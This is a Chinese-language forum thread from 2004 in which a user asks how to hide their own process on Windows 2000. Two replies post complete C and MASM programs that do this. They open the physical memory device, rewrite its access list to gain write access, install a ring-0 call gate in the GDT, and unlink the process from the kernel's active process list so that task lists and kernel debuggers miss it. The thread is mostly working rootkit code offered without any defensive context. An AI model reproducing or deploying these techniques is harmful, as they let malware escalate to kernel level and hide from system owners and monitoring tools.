|
阅读:962回复:3
请高手指点
我想在W2000隐藏自己的进程。
|
|
最新喜欢: flying
|
|
沙发#
发布于:2004-03-22 13:39
"文章搜索", 以前有文章讲的很详细。
|
|
|
板凳#
发布于:2004-03-22 15:13
/*
在讲解之前,首先提一提一些结构,进程执行体块中有数个进程相关链,其中之一是 活动进程链。此链的重要 作用之一就是在查询系统信息时供遍历当前活动进程,很有意思的是M$可能因效率因素 使它被排除出进程核心块, 意味进线程切换等操作时并不利用它,进一步说改写它也不该有不可忽视的问题(此即 本方案的基础)。 怎么做很明显了,在活动进程双向链中删除想要得隐藏的进程既可,核心调试器(如 softice/proc)亦查不出来。 2000下的隐藏当前进程的代码如下: */ #include<windows.h> #include<Accctrl.h> #include<Aclapi.h> #define NT_SUCCESS(Status)((NTSTATUS)(Status) >= 0) #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L) #define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L) typedef LONG NTSTATUS; typedef struct _IO_STATUS_BLOCK { NTSTATUS Status; ULONG Information; } IO_STATUS_BLOCK, *PIO_STATUS_BLOCK; typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING, *PUNICODE_STRING; #define OBJ_INHERIT 0x00000002L #define OBJ_PERMANENT 0x00000010L #define OBJ_EXCLUSIVE 0x00000020L #define OBJ_CASE_INSENSITIVE 0x00000040L #define OBJ_OPENIF 0x00000080L #define OBJ_OPENLINK 0x00000100L #define OBJ_KERNEL_HANDLE 0x00000200L #define OBJ_VALID_ATTRIBUTES 0x000003F2L typedef struct _OBJECT_ATTRIBUTES { ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService; } OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; typedef NTSTATUS (CALLBACK* ZWOPENSECTION)( OUT PHANDLE SectionHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes ); typedef VOID (CALLBACK* RTLINITUNICODESTRING)( IN OUT PUNICODE_STRING DestinationString, IN PCWSTR SourceString ); RTLINITUNICODESTRING RtlInitUnicodeString; ZWOPENSECTION ZwOpenSection; HMODULE g_hNtDLL = NULL; PVOID g_pMapPhysicalMemory = NULL; HANDLE g_hMPM = NULL; OSVERSIONINFO g_osvi; BOOL InitNTDLL() { g_hNtDLL = LoadLibrary( "ntdll.dll" ); if ( !g_hNtDLL ) { return FALSE; } RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL, "RtlInitUnicodeString"); ZwOpenSection = (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection"); return TRUE; } VOID CloseNTDLL() { if(g_hNtDLL != NULL) { FreeLibrary(g_hNtDLL); } g_hNtDLL = NULL; } VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection) { PACL pDacl=NULL; PACL pNewDacl=NULL; PSECURITY_DESCRIPTOR pSD=NULL; DWORD dwRes; EXPLICIT_ACCESS ea; if(dwRes=GetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION, NULL,NULL,&pDacl,NULL,&pSD)!=ERROR_SUCCESS) { goto CleanUp; } ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS)); ea.grfAccessPermissions = SECTION_MAP_WRITE; ea.grfAccessMode = GRANT_ACCESS; ea.grfInheritance= NO_INHERITANCE; ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME; ea.Trustee.TrusteeType = TRUSTEE_IS_USER; ea.Trustee.ptstrName = "CURRENT_USER"; if(dwRes=SetEntriesInAcl(1,&ea,pDacl,&pNewDacl)!=ERROR_SUCCESS) { goto CleanUp; } if(dwRes=SetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,NULL,NULL,pNewDacl,NULL)!=ERROR_SUCCESS) { goto CleanUp; } CleanUp: if(pSD) LocalFree(pSD); if(pNewDacl) LocalFree(pNewDacl); } HANDLE OpenPhysicalMemory() { NTSTATUS status; UNICODE_STRING physmemString; OBJECT_ATTRIBUTES attributes; ULONG PhyDirectory ; g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); GetVersionEx (&g_osvi); if (g_osvi.dwMajorVersion != 5) return NULL; switch(g_osvi.dwMinorVersion) { case 0: PhyDirectory=0x30000; break; //2k case 1: PhyDirectory=0x39000; break; //xp default: return NULL; } RtlInitUnicodeString( &physmemString, L"\\Device\\PhysicalMemory" ); attributes.Length= sizeof(OBJECT_ATTRIBUTES); attributes.RootDirectory= NULL; attributes.ObjectName= &physmemString; attributes.Attributes= 0; attributes.SecurityDescriptor= NULL; attributes.SecurityQualityOfService= NULL; status = ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes); if(status == STATUS_ACCESS_DENIED) { status = ZwOpenSection(&g_hMPM,READ_CONTROL|WRITE_DAC,&attributes); SetPhyscialMemorySectionCanBeWrited(g_hMPM); CloseHandle(g_hMPM); status =ZwOpenSection(&g_hMPM,SECTION_MAP_READ|SECTION_MAP_WRITE,&attributes); } if( !NT_SUCCESS( status )) { return NULL; } g_pMapPhysicalMemory = MapViewOfFile( g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, //MAP_READWRITE 0, PhyDirectory, 0x1000); if( g_pMapPhysicalMemory == NULL ) { return NULL; } return g_hMPM; } PVOID LinearToPhys(PULONG BaseAddress,PVOID addr) { ULONG VAddr=(ULONG)addr,PGDE,PTE,PAddr; PGDE=BaseAddress[VAddr>>22]; if ((PGDE&1)!=0) { ULONG tmp=PGDE&0x00000080; if (tmp!=0) { PAddr=(PGDE&0xFFC00000)+(VAddr&0x003FFFFF); } else { PGDE=(ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000); PTE=((PULONG)PGDE)[(VAddr&0x003FF000)>>12]; if ((PTE&1)!=0) { PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF); UnmapViewOfFile((PVOID)PGDE); } else return 0; } } else return 0; return (PVOID)PAddr; } ULONG GetData(PVOID addr) { ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr); //ULONG phys=LinearAddressToPhysicalAddress((unsigned long)addr); PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000); if (tmp==0) return 0; ULONG ret=tmp[(phys & 0xFFF)>>2]; UnmapViewOfFile(tmp); return ret; } BOOL SetData(PVOID addr,ULONG data) { ULONG phys=(ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory,(PVOID)addr); PULONG tmp=(PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000); if (tmp==0) return FALSE; tmp[(phys & 0xFFF)>>2]=data; UnmapViewOfFile(tmp); return TRUE; } BOOL HideProcessAtAll() { if (InitNTDLL()) { ULONG fw,bw; if (OpenPhysicalMemory()==0) { return FALSE; } ULONG thread=GetData((PVOID)0xFFDFF124); //kteb ULONG process=GetData(PVOID(thread+0x44)); //kpeb if (g_osvi.dwMinorVersion == 0) fw=GetData(PVOID(process+0xa0)),bw=GetData(PVOID(process+0xa4)); if (g_osvi.dwMinorVersion ==1) fw=GetData(PVOID(process+0x88)),bw=GetData(PVOID(process+0x8c)); SetData(PVOID(fw+4),bw); SetData(PVOID(bw),fw); CloseHandle(g_hMPM); CloseNTDLL(); } return TRUE; } long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp) { MessageBox(0,"error","error",0); ExitProcess(0); } int main(int argc,char*argv[]) { SetUnhandledExceptionFilter(exeception); HideProcessAtAll(); MessageBox(0,"OK","OK",0); return 0; } |
|
|
|
地板#
发布于:2004-03-22 15:14
.686p
.model flat, stdcall option casemap :none ; case sensitive ; ######################################################################### include \masm32\include\windows.inc include \masm32\include\user32.inc include \masm32\include\kernel32.inc include \masm32\include\advapi32.inc includelib \masm32\lib\user32.lib includelib \masm32\lib\kernel32.lib includelib \masm32\lib\advapi32.lib DEBUG = TRUE HMODULE typedef dword NTSTATUS typedef dword PACL typedef dword PSECURITY_DESCRIPTOR typedef dword OBJ_INHERIT=2 OBJ_PERMANENT=10h OBJ_EXCLUSIVE=20h OBJ_CASE_INSENSITIVE=40h OBJ_OPENIF=80h OBJ_OPENLINK =100h OBJ_KERNEL_HANDLE=200 OBJ_VALID_ATTRIBUTES=3F2h SE_KERNEL_OBJECT = 6 GRANT_ACCESS =1 NO_INHERITANCE =0 TRUSTEE_IS_NAME=1 TRUSTEE_IS_USER=1 STATUS_SUCCESS =0 STATUS_ACCESS_DENIED =0C0000022h STATUS_ACCESS_VIOLATION equ 0C0000005h STATUS_INFO_LENGTH_MISMATCH equ 0C0000004h SystemModuleInformation equ 11 PVOID TYPEDEF DWORD UNLONG TYPEDEF DWORD CHAR TYPEDEF BYTE UNICODE_STRING struct nLength word ? MaximumLength word ? Buffer dword ? UNICODE_STRING ends OBJECT_ATTRIBUTES struct nLength dword ? RootDirectory HANDLE ? ObjectName dword ?;PUNICODE_STRING Attributes dword ?; SecurityDescriptor dword ?; PVOID // Points to type SECURITY_DESCRIPTOR SecurityQualityOfService dword ?;PVOID // Points to type SECURITY_QUALITY_OF_SERVICE OBJECT_ATTRIBUTES ends TRUSTEE struct pMultipleTrustee dword ?;PTRUSTEE MultipleTrusteeOperation dword ?; MULTIPLE_TRUSTEE_OPERATION TrusteeForm dword ?;TRUSTEE_FORM TrusteeType dword ?;TRUSTEE_TYPE ptstrName dword ?;LPTSTR TRUSTEE ends EXPLICIT_ACCESS struct grfAccessPermissions DWORD ? grfAccessMode dword ? ;ACCESS_MODE grfInheritance DWORD ? ; Trustee TRUSTEE <> ; EXPLICIT_ACCESS ends MyGATE struct ;门结构类型定义 OFFSETL WORD ? ;32位偏移的低16位 SELECTOR WORd ? ;选择子 DCOUNT BYTE ? ;双字计数字段 GTYPE BYTE ? ;类型 OFFSETH WORD ? ;32位偏移的高16位 MyGATE ends SetPhyscialMemorySectionCanBeWrited proto :dword MiniMmGetPhysicalAddress proto :dword ENTERRING0 macro pushad pushfd cli mov eax,cr0 ;get rid off readonly protect and eax,0fffeffffh mov cr0,eax endm LEAVERING0 macro mov eax,cr0 ;restore readonly protect or eax,10000h mov cr0,eax sti popfd popad retf endm UNICODE_STR macro str irpc _c,<str> db '&_c' db 0 endm endm .data? GdtLimit dw ? GdtAddr dd ? mapAddr dd ? OldEsp dd ? ProcessOffset dd ? g_osvi OSVERSIONINFO<?> .data align 4 objname dw objnamestr_size,objnamestr_size+2 objnameptr dd 0 objnamestr equ this byte UNICODE_STR <\Device\PhysicalMemory> objnamestr_size equ $-objnamestr align 4 ObjAttr db 24 dup (0) IsIdtFlag dd 0 IsNt dd 0 IsXp dd 0 Callgt dq 0 ;call gate's sel:off Caption db 'Hide Process',0 Text db "Can you see me?",0 .code SetPhyscialMemorySectionCanBeWrited proc uses ebx esi edi hSection:HANDLE local pDacl: PACL local pNewDacl:PACL local pSD :PSECURITY_DESCRIPTOR local dwRes:DWORD ; local ea:EXPLICIT_ACCESS ; invoke GetSecurityInfo,hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,\ NULL,NULL, addr pDacl,NULL, addr pSD cmp eax,ERROR_SUCCESS jz @f jmp OutSet @@: mov dwRes,eax mov ea.grfAccessPermissions ,SECTION_MAP_WRITE;2 mov ea.grfAccessMode ,GRANT_ACCESS;1 mov ea.grfInheritance,NO_INHERITANCE;0 mov ea.Trustee.pMultipleTrustee,0 mov ea.Trustee.MultipleTrusteeOperation,0 mov ea.Trustee.TrusteeForm,TRUSTEE_IS_NAME;1 mov ea.Trustee.TrusteeType,TRUSTEE_IS_USER;1 call @f db "CURRENT_USER",0 @@: pop edx mov ea.Trustee.ptstrName,edx invoke SetEntriesInAcl,1,addr ea,pDacl,addr pNewDacl cmp eax,ERROR_SUCCESS jz @f jmp OutSet @@: invoke SetSecurityInfo,hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,\ NULL,NULL,pNewDacl,NULL OutSet: cmp pSD,0 jz @f invoke LocalFree,pSD @@: cmp pNewDacl,0 jz @f invoke LocalFree,pNewDacl @@: ret SetPhyscialMemorySectionCanBeWrited endp MiniMmGetPhysicalAddress proc virtualaddress:dword mov eax,virtualaddress cmp eax,80000000h jb @f cmp eax,0a0000000h jae @f and eax,1FFFF000h ret @@: mov eax,0 ret MiniMmGetPhysicalAddress endp ExecRing0Proc proc local tmpSel:dword local setcg:dword local BaseAddress:dword local NtdllMod :dword local hSection:HANDLE local status:NTSTATUS local objectAttributes:OBJECT_ATTRIBUTES local objName:UNICODE_STRING mov status,STATUS_SUCCESS; sgdt GdtLimit invoke MiniMmGetPhysicalAddress,GdtAddr mov mapAddr,eax test eax,eax jz Exit1 call @f db "Ntdll.dll",0 @@: call LoadLibraryA mov NtdllMod,eax lea edx,objnamestr mov objnameptr,edx lea edi,ObjAttr and di,0fffch ;align to 4 bytes,or ZwOpenSection will fail push edi ;edi->ObjAttr push 24 ;length of <\Device\PhysicalMemory> pop ecx push ecx xor eax,eax rep stosb ;put ObjAttr with 0 pop ecx pop edi mov esi,edi stosd mov dword ptr[esi],ecx stosd lea eax,[edx-8] ;eax->objname stosd ;ObjAddr(18h,00,00,00,00,00,00,00,offset objname,40,02,00,00,dd 2 dup(0) mov dword ptr [edi],240h call @f db "ZwOpenSection",0 @@: push NtdllMod call GetProcAddress mov ebx,eax ;ebx=ZwOpenSection push esi ;esi->ObjAttr push SECTION_MAP_READ or SECTION_MAP_WRITE lea edi,hSection push edi ;edi->hSection call eax ;ZwOpenSection(&hSection,SECTION_MAP_READ or SECTION_MAP_WRITE,ObjAttr) mov status,eax cmp status,STATUS_ACCESS_DENIED jnz AccessPermit mov eax,ebx push esi push READ_CONTROL or WRITE_DAC push edi call eax mov status,eax invoke SetPhyscialMemorySectionCanBeWrited,hSection call @f db "ZwClose",0 @@: push NtdllMod call GetProcAddress push hSection call eax ;zwClose hSection mov eax,ebx push esi push SECTION_MAP_READ or SECTION_MAP_WRITE lea edi,hSection push edi call eax mov status ,eax ;status =ZwOpenSection(&hSection,SECTION_MAP_WRITE|SECTION_MAP_WRITE,&objectAttributes); AccessPermit: cmp status ,STATUS_SUCCESS jz @f ;printf("Error Open PhysicalMemory Section Object,Status:%08X\n",status); ;return 0; mov eax,0 ret @@: movzx eax,word ptr[GdtLimit] inc eax invoke MapViewOfFile,hSection, FILE_MAP_READ or FILE_MAP_WRITE, 0, mapAddr, \ eax mov BaseAddress,eax cmp BaseAddress,0 jnz @f ;printf("Error MapViewOfFile:"); ;PrintWin32Error(GetLastError()); return 0; mov eax,0 ret @@: mov esi,eax ;esi->gdt base mov ecx,3e0h mov eax,GdtAddr .if dword ptr [esi+ecx+2]!=0ec0003e8h mov byte ptr [esi],0c3h mov word ptr [esi+ecx],ax shr eax,16 mov word ptr [esi+ecx+6],ax mov dword ptr [esi+ecx+2],0ec0003e8h mov dword ptr [esi+ecx+8],0000ffffh mov dword ptr [esi+ecx+12],00cf9a00h .endif mov setcg,TRUE cmp setcg,0 jnz ChangeOK call @f db "ZwClose",0 @@: push NtdllMod call GetProcAddress push hSection call eax xor eax,eax ret ChangeOK: and dword ptr Callgt,0 xor eax,eax mov ax,3e0h or al,3h mov word ptr [Callgt+4],ax ;farcall[2]=((short)((ULONG)cg-(ULONG)BaseAddress))|3; //Ring 3 callgate; lea eax,_Ring0Proc ;invoke VirtualLock,eax,seglen test eax,eax jnz @f xor eax,eax ret @@: invoke GetCurrentThread invoke SetThreadPriority,eax,THREAD_PRIORITY_TIME_CRITICAL mov eax,3e0h lar edx,eax jnz Ring3 invoke Sleep,0 call fword ptr [Callgt] ;use callgate to Ring0! _Ring0Proc: ; Ring0 code here.. mov eax,esp ;save ring0 esp mov esp,[esp+4];->ring3 esp push eax pushad mov eax,dword ptr ds:[0ffdff124h];kteb mov eax,[eax+44h] ;kpeb .if IsNt==1 mov ProcessOffset,0a0h .elseif IsXp==1 mov ProcessOffset,088h .endif mov ecx,ProcessOffset mov esi,dword ptr[eax+ecx] ;forword mov edi,dword ptr[eax+ecx+4] ;backword mov dword ptr[esi+4],edi mov dword ptr[edi],esi popad pop esp ;restore ring0 esp push offset Ring3 retf Ring0CodeLen=$-_Ring0Proc Ring3: invoke GetCurrentThread invoke SetThreadPriority,eax,THREAD_PRIORITY_NORMAL ;invoke VirtualUnlock,Entry,seglen call @f db "ZwClose",0 @@: push NtdllMod call GetProcAddress push hSection call eax mov eax,TRUE ret ExecRing0Proc endp main: assume fs:nothing push offset MySEH push fs:[0] mov fs:[0],esp mov OldEsp,esp mov ax,ds ;if Win9x? test ax,4 jnz Exit1 push esi lea esi,g_osvi assume esi:ptr OSVERSIONINFO mov [esi].dwOSVersionInfoSize,sizeof OSVERSIONINFO invoke GetVersionEx,addr g_osvi .if [esi].dwMajorVersion != 5 jmp Exit1 .endif .if [esi].dwMinorVersion==0 mov IsNt,1 .elseif [esi].dwMinorVersion==1 mov IsXp,1 .else jmp Exit1 .endif pop esi invoke ExecRing0Proc invoke MessageBoxA,0,addr Text,addr Caption,MB_OK Exit1: pop fs:[0] add esp,4 invoke ExitProcess,0 MySEH : mov esp,OldEsp pop fs:[0] add esp,4 invoke ExitProcess,-1 end main |
|
|